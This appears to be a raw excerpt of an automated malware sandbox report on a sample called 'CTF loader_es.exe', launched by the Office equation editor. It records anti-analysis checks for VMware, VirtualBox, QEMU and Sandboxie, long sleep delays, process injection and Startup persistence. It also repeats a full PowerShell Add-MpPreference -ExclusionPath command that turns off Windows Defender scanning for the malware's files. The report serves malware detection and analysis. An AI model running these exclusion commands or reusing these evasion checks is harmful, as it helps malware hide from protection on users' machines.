Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to delay execution (extensive OutputDebugStringW loop)Show sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: OutputDebugStringW count: 112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: OutputDebugStringW count: 212
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2392Thread sleep count: 100 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2652Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2372Thread sleep count: 88 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2488Thread sleep count: 85 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_01DB096A GetSystemInfo,5_2_01DB096A
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\Jump to behavior
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2119619399.0000000000554000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMwareVBox
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory written: unknown base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
